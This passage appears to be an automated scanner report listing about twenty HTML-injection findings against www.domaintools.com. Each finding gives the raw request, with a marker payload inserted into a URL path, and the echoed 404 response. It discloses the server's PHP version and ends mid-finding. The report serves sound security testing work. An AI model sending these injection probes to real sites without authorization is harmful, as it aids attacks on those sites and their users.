<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=domain-monitor4614d"><a>113abf8024c">
...[SNIP]...

3.153. http://www.domaintools.com/monitor/domain-monitor/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /monitor/domain-monitor/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 21bbd<a>b0bb27b613f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /monitor/21bbd<a>b0bb27b613f/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:14:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:42 GMT
Content-Length: 12020
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>b0bb27b613f">Whois record for "21bbd<a>b0bb27b613f"</a>
...[SNIP]...

3.154. http://www.domaintools.com/monitor/name-server-alert/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /monitor/name-server-alert/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61b6e"><a>88a6b050eed was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /monitor/name-server-alert61b6e"><a>88a6b050eed/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:14:36 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:36 GMT
Content-Length: 12168
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=name-server-alert61b6e"><a>88a6b050eed">
...[SNIP]...

3.155. http://www.domaintools.com/monitor/name-server-alert/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /monitor/name-server-alert/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f2f6f<a>38d4b0dc78f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /monitor/f2f6f<a>38d4b0dc78f/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:14:49 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:50 GMT
Content-Length: 12020
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>38d4b0dc78f">Whois record for "f2f6f<a>38d4b0dc78f"</a>
...[SNIP]...

3.156. http://www.domaintools.com/monitor/registrant-alert/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /monitor/registrant-alert/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af2ed"><a>4d5586e0472 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /monitor/registrant-alertaf2ed"><a>4d5586e0472/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:14:40 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:40 GMT
Content-Length: 12163
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=registrant-alertaf2ed"><a>4d5586e0472">
...[SNIP]...

3.157. http://www.domaintools.com/monitor/registrant-alert/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /monitor/registrant-alert/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 597e7<a>00fe2604623 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /monitor/597e7<a>00fe2604623/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:14:52 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:53 GMT
Content-Length: 12020
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>00fe2604623">Whois record for "597e7<a>00fe2604623"</a>
...[SNIP]...

3.158. http://www.domaintools.com/monitor/trademark-alert/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /monitor/trademark-alert/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f029d<a>72948e822b9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /monitor/f029d<a>72948e822b9/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:15:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:15:06 GMT
Content-Length: 12020
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>72948e822b9">Whois record for "f029d<a>72948e822b9"</a>
...[SNIP]...

3.159. http://www.domaintools.com/monitor/trademark-alert/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /monitor/trademark-alert/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e815"><a>bafa23d7668 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /monitor/trademark-alert3e815"><a>bafa23d7668/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:14:51 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:51 GMT
Content-Length: 12158
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=trademark-alert3e815"><a>bafa23d7668">
...[SNIP]...

3.160. http://www.domaintools.com/research/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /research/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e0b5"><a>6e7a0c8ea0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /research6e0b5"><a>6e7a0c8ea0/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:14:40 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:40 GMT
Content-Length: 12085
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=research6e0b5"><a>6e7a0c8ea0">
...[SNIP]...

3.161. http://www.domaintools.com/research/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /research/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a9589<a>3ec03712067 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /researcha9589<a>3ec03712067/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:14:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:53 GMT
Content-Length: 12072
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>3ec03712067">Whois record for "researcha9589<a>3ec03712067"</a>
...[SNIP]...

3.162. http://www.domaintools.com/research/dns/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /research/dns/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf137"><a>0d360a3a1ec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /research/dnscf137"><a>0d360a3a1ec/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:14:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:54 GMT
Content-Length: 12067
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=dnscf137"><a>0d360a3a1ec">
...[SNIP]...

3.163. http://www.domaintools.com/research/dns/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /research/dns/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 37d47<a>809ca84a5c0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /research/dns37d47<a>809ca84a5c0/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:15:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:15:08 GMT
Content-Length: 12046
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>809ca84a5c0">Whois record for "dns37d47<a>809ca84a5c0"</a>
...[SNIP]...

3.164. http://www.domaintools.com/research/hosting-history/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /research/hosting-history/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7bfe8<a>8d83bd06792 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /research/7bfe8<a>8d83bd06792/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:09:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:09:06 GMT
Content-Length: 12022
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>8d83bd06792">Whois record for "7bfe8<a>8d83bd06792"</a>
...[SNIP]...

3.165. http://www.domaintools.com/research/hosting-history/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /research/hosting-history/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0fe7"><a>d0e56e1de48 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /research/hosting-historyd0fe7"><a>d0e56e1de48/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:08:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:08:54 GMT
Content-Length: 12160
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=hosting-historyd0fe7"><a>d0e56e1de48">
...[SNIP]...

3.166. http://www.domaintools.com/research/name-server-report/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /research/name-server-report/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca5a9"><a>fc60e1bbf1a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /research/name-server-reportca5a9"><a>fc60e1bbf1a/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:15:04 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:15:05 GMT
Content-Length: 12175
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=name-server-reportca5a9"><a>fc60e1bbf1a">
...[SNIP]...

3.167. http://www.domaintools.com/research/name-server-report/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /research/name-server-report/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2fcf6<a>b2409955a23 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /research/2fcf6<a>b2409955a23/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:15:19 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:15:19 GMT
Content-Length: 12022
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>b2409955a23">Whois record for "2fcf6<a>b2409955a23"</a>
...[SNIP]...

3.168. http://www.domaintools.com/research/reverse-ip/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /research/reverse-ip/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 81801<a>c88cfecc2ad was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /research/reverse-ip81801<a>c88cfecc2ad/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:09:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:09:21 GMT
Content-Length: 12102
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>c88cfecc2ad">Whois record for "reverse-ip81801<a>c88cfecc2ad"</a>
...[SNIP]...

3.169. http://www.domaintools.com/research/reverse-ip/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /research/reverse-ip/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9674b"><a>2dd03605f86 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /research/reverse-ip9674b"><a>2dd03605f86/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:09:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:09:09 GMT
Content-Length: 12123
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=reverse-ip9674b"><a>2dd03605f86">
...[SNIP]...

3.170. http://www.domaintools.com/research/reverse-whois/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /research/reverse-whois/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7831a"><a>e8224b58c1f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /research/reverse-whois7831a"><a>e8224b58c1f/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:15:20 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:15:20 GMT
Content-Length: 12147
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=reverse-whois7831a"><a>e8224b58c1f">
...[SNIP]...

3.171. http://www.domaintools.com/research/reverse-whois/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /research/reverse-whois/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ad1dd<a>b098f8c0d3c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /research/ad1dd<a>b098f8c0d3c/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:15:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:15:29 GMT
Content-Length: 12022
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>b098f8c0d3c">Whois record for "ad1dd<a>b098f8c0d3c"</a>
...[SNIP]...

3.172. http://www.domaintools.com/research/whois-applications/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /research/whois-applications/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddbad"><a>45bf58e5a7c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /research/whois-applicationsddbad"><a>45bf58e5a7c/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

